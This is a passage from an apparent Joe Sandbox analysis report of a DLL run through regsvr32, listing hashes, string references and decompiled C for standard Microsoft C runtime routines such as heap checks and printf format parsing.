                                                      • Instruction Fuzzy Hash: 25518C32A1864A86F7909B59E88076EB3E1F3807A5F609321E1ED077F5D7BED500CB01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Heap$AllocH_enabledSize_invalid_parameter_is_
                                                      • String ID: _expand_base$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\expand.c$pBlock != NULL
                                                      • API String ID: 1608253119-1427866139
                                                      • Opcode ID: b3a6b944d23a3465c4e6046a1e88bc32cc41bb9fe3a320684877be901aeb32e4
                                                      • Instruction ID: af7a509f9d9663d3d091774dda128b819ecaca6506a1d0d194354ddf51f74ba4
                                                      • Opcode Fuzzy Hash: b3a6b944d23a3465c4e6046a1e88bc32cc41bb9fe3a320684877be901aeb32e4
                                                      • Instruction Fuzzy Hash: 0F41573191DB4686E7A09B20F84436E72E0F786780F614135E6CD43AF8CBBEE485CB41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: ("Buffer too small", 0)$_vsnwprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vswprint.c$format != NULL$string != NULL && sizeInWords > 0
                                                      • API String ID: 2123368286-2958264153
                                                      • Opcode ID: ced4706838129b7b95ee409a728acbeff35cdf169ec97d38e23daf610fb20cc8
                                                      • Instruction ID: 82e3240dde4e8d48ae566a9cb8a6505450234aa7e72eaba3f84792f0d3cada8d
                                                      • Opcode Fuzzy Hash: ced4706838129b7b95ee409a728acbeff35cdf169ec97d38e23daf610fb20cc8
                                                      • Instruction Fuzzy Hash: 3CE14D31A1DA868AEBB48B24E84076EB3E0F385765F204225E6DD43BE5DB7ED445CB01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: get_int64_arg
                                                      • String ID: ("Incorrect format specifier", 0)$-$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                      • API String ID: 1967237116-569934968
                                                      • Opcode ID: a4b0ff099cb4cab39938a39410f3255722065ce2ff61adb6fbb12e1a083add00
                                                      • Instruction ID: 28cad1f176e9be3240a3a6eae7be917d28bff7715537f6893ff636485155e31a
                                                      • Opcode Fuzzy Hash: a4b0ff099cb4cab39938a39410f3255722065ce2ff61adb6fbb12e1a083add00
                                                      • Instruction Fuzzy Hash: 4AD11D7260DBC58BE7B1CB65E8507AEB7E4F384785F200125EAC886AA9DB7DD540CF00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E000007FE7FEF9D3BFDE(char _a696, char _a976) {
                                                      
                                                      				_a976 = _a696;
                                                      				_a976 = _a976 - 0x41;
                                                      				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
                                                      				goto __rax;
                                                      			}



                                                      0x7fef9d3bfe6
                                                      0x7fef9d3bff7
                                                      0x7fef9d3c006
                                                      0x7fef9d3c02d

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: wctomb_s
                                                      • String ID: $("Incorrect format specifier", 0)$7$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                      • API String ID: 2215178078-1895985292
                                                      • Opcode ID: cbe9265cfe95002cd01c633456f4143dcea286b255341fa392fef384a43988b7
                                                      • Instruction ID: 997c34190204a200d34649c4b27f82da9c53e16be2ae3c50a0a3632b50fb2b35
                                                      • Opcode Fuzzy Hash: cbe9265cfe95002cd01c633456f4143dcea286b255341fa392fef384a43988b7
                                                      • Instruction Fuzzy Hash: E5B12E7260C7C68AE7B1CB24E8457AEB7E4F384785F604126DAD887AA9DB7DD540CF00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: ("Buffer too small", 0)$_vsprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c$format != NULL$string != NULL && sizeInBytes > 0
                                                      • API String ID: 2123368286-348877268
                                                      • Opcode ID: 2cfb79548520c5644ac56b859ec2257f97161b74a067da09cc3df7a1a7a1eb8b
                                                      • Instruction ID: 912ac3d754b702bf63931d64d46681ea7dc30ff1a731304ef262a69894a36d33
                                                      • Opcode Fuzzy Hash: 2cfb79548520c5644ac56b859ec2257f97161b74a067da09cc3df7a1a7a1eb8b
                                                      • Instruction Fuzzy Hash: 60913A32A0DA4286E7A08B68E84476E77E0F394365F204625E7DD43AF8DB7EE5458F01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                      • String ID: ("Incorrect format specifier", 0)$(ch != _T('\0'))$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                      • API String ID: 2192614184-4087627024
                                                      • Opcode ID: 129faf18f11d0aee11f016f36c84ee6a14c26cc1d7ed9976eab63fbc1969d985
                                                      • Instruction ID: 0390e2d988dd4d1b4c77dc3c399ba89b4ed25e2388807167c80bf5b266a398b6
                                                      • Opcode Fuzzy Hash: 129faf18f11d0aee11f016f36c84ee6a14c26cc1d7ed9976eab63fbc1969d985
                                                      • Instruction Fuzzy Hash: 95713A72A0D6C286E7F09B24E8947BEB7E4E384345F604126D6CD86AA9DB3ED540CF11
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: dst != NULL$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\memcpy_s.c$memcpy_s$sizeInBytes >= count$src != NULL
                                                      • API String ID: 2123368286-3692278645
                                                      • Opcode ID: 55675c40df69ab8a15ad1ce5aa383a74447e024eaeb1f72783c964e483dda9b8
                                                      • Instruction ID: a0804de238eaeeb3fb2e5788e9c0a34a411087d46cc23648724fab17a52a0f2c
                                                      • Opcode Fuzzy Hash: 55675c40df69ab8a15ad1ce5aa383a74447e024eaeb1f72783c964e483dda9b8
                                                      • Instruction Fuzzy Hash: 0E513C31A1C68686F7A0CB24E8447BE76E5F384344F604136E6CD47AB8DBBEE544CB01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _free_base_malloc_base
                                                      • String ID:
                                                      • API String ID: 3824334587-0
                                                      • Opcode ID: f253414e3849525c296ec210365ea501a1b810d2bb56cf35f247e52024ae0b7b
                                                      • Instruction ID: 495d8382669efda2ae004298a380b2f700874c64e4d866c5cb6fbd4b09cb9029
                                                      • Opcode Fuzzy Hash: f253414e3849525c296ec210365ea501a1b810d2bb56cf35f247e52024ae0b7b
                                                      • Instruction Fuzzy Hash: AC312D3191D68285E7E49B60EC0437EA3E1F7853A4F214535A6DE466F5CFBEE4809B01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: Bad memory block found at 0x%p.$Bad memory block found at 0x%p.Memory allocated at %hs(%d).$_CrtMemCheckpoint$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$state != NULL
                                                      • API String ID: 2123368286-817335350
                                                      • Opcode ID: 3b86e21d312907f031a9c3af8c0eef3d8af61768b64ebe8bc9406c081913c3b7
                                                      • Instruction ID: bdf1888ae082cb337f1151e8154f2efa45ef3de29dcf6e6b26155e3a2b634fb1
                                                      • Opcode Fuzzy Hash: 3b86e21d312907f031a9c3af8c0eef3d8af61768b64ebe8bc9406c081913c3b7
                                                      • Instruction Fuzzy Hash: 6461FB36A18B4586EB64CB19E89132E77A0F785794F714126EBCD83BB4CB3ED451CB00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E000007FE7FEF9D2CFF0(intOrPtr _a8) {
                                                      				intOrPtr _v24;
                                                      				long long _v48;
                                                      				long long _v64;
                                                      				intOrPtr _t21;
                                                      
                                                      				_a8 = _t21;
                                                      				_v48 = 0;
                                                      				_v64 = 0;
                                                      				_v24 = _a8;
                                                      				_v24 = _v24 - 2;
                                                      				if (_v24 - 0x14 > 0) goto 0xf9d2d13e;
                                                      				goto __rax;
                                                      			}








                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: ("Invalid signal or error", 0)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\winsig.c$raise
                                                      • API String ID: 2123368286-2245755083
                                                      • Opcode ID: 18adc300c2b93f7eab7b819d563e90f5c41814788a4c43fa347d2340d41b98cd
                                                      • Instruction ID: 19b7c93d4736ed7bda32945b1fb5f0ab86c56f1dc684690d029957412a3b2f1f
                                                      • Opcode Fuzzy Hash: 18adc300c2b93f7eab7b819d563e90f5c41814788a4c43fa347d2340d41b98cd
                                                      • Instruction Fuzzy Hash: 8C71E83291C786CAE7A09F58E84476EB7E0F785754F214135E6CA47BA4CB3EE448CB11
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: HeapPointerValid
                                                      • String ID: _BLOCK_TYPE_IS_VALID(pHead->nBlockUse)$_CrtCheckMemory()$_CrtIsValidHeapPointer(pUserData)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$L7$LX
                                                      • API String ID: 299318057-1988567080
                                                      • Opcode ID: 449abee572b00c001843884aa05b8e5cdaea28f8affc6eceb55751fcc4bbfe52
                                                      • Instruction ID: 366f9875c4733d956d5456637ee1c03ed06e45eb4220731ed3e90847f50651e0
                                                      • Opcode Fuzzy Hash: 449abee572b00c001843884aa05b8e5cdaea28f8affc6eceb55751fcc4bbfe52
                                                      • Instruction Fuzzy Hash: FB314D36A1874A86EBE48B59E84172E67D1F785784F614036EACD83BB4DB3FD440CB01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: EncodePointer$_realloc_dbg
                                                      • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\onexit.c$}
                                                      • API String ID: 429494535-1858280179
                                                      • Opcode ID: 950a78d59f72efd3ce43bd8456283c625fce50364ef15d6a0f5e845d51c15c3f
                                                      • Instruction ID: 6b22acafcb165364cee05dc597c268ac6a46098997f00e2a063c2d8cfde95e66
                                                      • Opcode Fuzzy Hash: 950a78d59f72efd3ce43bd8456283c625fce50364ef15d6a0f5e845d51c15c3f
                                                      • Instruction Fuzzy Hash: D441B836619B8586DA90CB59F88432EB7E4F7C9794F201025EACE43B68DF7ED4958B00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: get_int64_arg
                                                      • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                      • API String ID: 1967237116-734865713
                                                      • Opcode ID: c2425827690f07a93f69eb38b450ff2678cd23c1eb01a19a01dfffa3a40938e6
                                                      • Instruction ID: ca3ec57313c22d844cddba0ccc7478434e3ff2f5ac626f229199dffed11d05c2
                                                      • Opcode Fuzzy Hash: c2425827690f07a93f69eb38b450ff2678cd23c1eb01a19a01dfffa3a40938e6
                                                      • Instruction Fuzzy Hash: 83D1CA72A0CAC686E7B18B55E8407AFB7E0F384355F600126E6DD87AA9DB7DE440CF14
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E000007FE7FEF9D3DF8D(signed short _a1208, signed int _a1412) {
                                                      
                                                      				_a1412 = _a1208 & 0x0000ffff;
                                                      				_a1412 = _a1412 - 0x41;
                                                      				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
                                                      				goto __rax;
                                                      			}




                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ("Incorrect format specifier", 0)$7$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                      • API String ID: 0-1585035072
                                                      • Opcode ID: 0bf90205098d20be4f4e59ab582b3189e67a2fe65aecfe549d1a450604364a50
                                                      • Instruction ID: 7092a431cc2f14586a5b6039053772aca43f1c1a92c9fb0ada713ca2b75f96be
                                                      • Opcode Fuzzy Hash: 0bf90205098d20be4f4e59ab582b3189e67a2fe65aecfe549d1a450604364a50
                                                      • Instruction Fuzzy Hash: 93B10D7260CAC286E7B1DB55E8417AFB7E0F784356F104026EAC987AA9DB7DE444CF10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: (count == 0) || (string != NULL)$(format != NULL)$_vswprintf_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vswprint.c
                                                      • API String ID: 2123368286-1876092940
                                                      • Opcode ID: 9846629aa5f9262a1bee0fdfcec26bb25970a0f61289143976d8b215326cf8ff
                                                      • Instruction ID: 5b23c079d1b4d794af0cdd69ad2b30100ea5e3abf5a9ef6833dde17c78c07454
                                                      • Opcode Fuzzy Hash: 9846629aa5f9262a1bee0fdfcec26bb25970a0f61289143976d8b215326cf8ff
                                                      • Instruction Fuzzy Hash: 40911E32618B85CAE7A48B15E84476E77E0F384795F208525E6DE87BB4DB3ED444CF01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 84%
                                                      			E000007FE7FEF9D3BE32(signed int _a80, signed int _a696, intOrPtr _a704, char _a972, signed int _a976, void* _a1096) {
                                                      
                                                      				_a972 = _a696 & 0x000000ff;
                                                      				if (_a972 == 0x49) goto 0xf9d3beb7;
                                                      				if (_a972 == 0x68) goto 0xf9d3bfc0;
                                                      				if (_a972 == 0x6c) goto 0xf9d3be76;
                                                      				if (_a972 == 0x77) goto 0xf9d3bfcd;
                                                      				goto 0xf9d3bfd9;
                                                      				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
                                                      				_a1096 = _a1096 + 1;
                                                      				asm("bts eax, 0xc");
                                                      				goto 0xf9d3beb2;
                                                      				_a80 = _a80 | 0x00000010;
                                                      				goto 0xf9d3bfd9;
                                                      				asm("bts eax, 0xf");
                                                      				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
                                                      				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
                                                      				_a1096 = _a1096 + 2;
                                                      				asm("bts eax, 0xf");
                                                      				goto 0xf9d3bfbe;
                                                      				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
                                                      				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
                                                      				_a1096 = _a1096 + 2;
                                                      				asm("btr eax, 0xf");
                                                      				goto 0xf9d3bfbe;
                                                      				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
                                                      				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
                                                      				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
                                                      				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
                                                      				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
                                                      				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
                                                      				goto 0xf9d3bfbe;
                                                      				_a704 = 0;
                                                      				goto E000007FE7FEF9D3BB66;
                                                      				goto 0xf9d3bfd9;
                                                      				_a80 = _a80 | 0x00000020;
                                                      				goto 0xf9d3bfd9;
                                                      				asm("bts eax, 0xb");
                                                      				_a976 = _a696;
                                                      				_a976 = _a976 - 0x41;
                                                      				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
                                                      				goto __rax;
                                                      			}




                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                                      • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c$w
                                                      • API String ID: 530996419-3826063230
                                                      • Opcode ID: 6f4341bf75342723462239bb8ed84b432b5f9ccd09e3c394fa39f7378907594f
                                                      • Instruction ID: d6c85ddd6a9fac6d59453cfc6279b165f514207326055716b4e5bf0dd1bf0ecb
                                                      • Opcode Fuzzy Hash: 6f4341bf75342723462239bb8ed84b432b5f9ccd09e3c394fa39f7378907594f
                                                      • Instruction Fuzzy Hash: 0A916F72A0D6C68AE3F08B54E88477EB7E4E385342F601026D7CD87AA9CB7ED5418F11
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 84%
                                                      			E000007FE7FEF9D3DDE0(signed int _a80, signed int _a1208, intOrPtr _a1216, signed int _a1408, signed int _a1412, signed short* _a1544) {
                                                      
                                                      				_a1408 = _a1208 & 0x0000ffff;
                                                      				if (_a1408 == 0x49) goto 0xf9d3de66;
                                                      				if (_a1408 == 0x68) goto 0xf9d3df6f;
                                                      				if (_a1408 == 0x6c) goto 0xf9d3de24;
                                                      				if (_a1408 == 0x77) goto 0xf9d3df7c;
                                                      				goto 0xf9d3df88;
                                                      				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
                                                      				_a1544 =  &(_a1544[1]);
                                                      				asm("bts eax, 0xc");
                                                      				goto 0xf9d3de61;
                                                      				_a80 = _a80 | 0x00000010;
                                                      				goto 0xf9d3df88;
                                                      				asm("bts eax, 0xf");
                                                      				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
                                                      				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
                                                      				_a1544 =  &(_a1544[2]);
                                                      				asm("bts eax, 0xf");
                                                      				goto 0xf9d3df6d;
                                                      				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
                                                      				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
                                                      				_a1544 =  &(_a1544[2]);
                                                      				asm("btr eax, 0xf");
                                                      				goto 0xf9d3df6d;
                                                      				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
                                                      				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
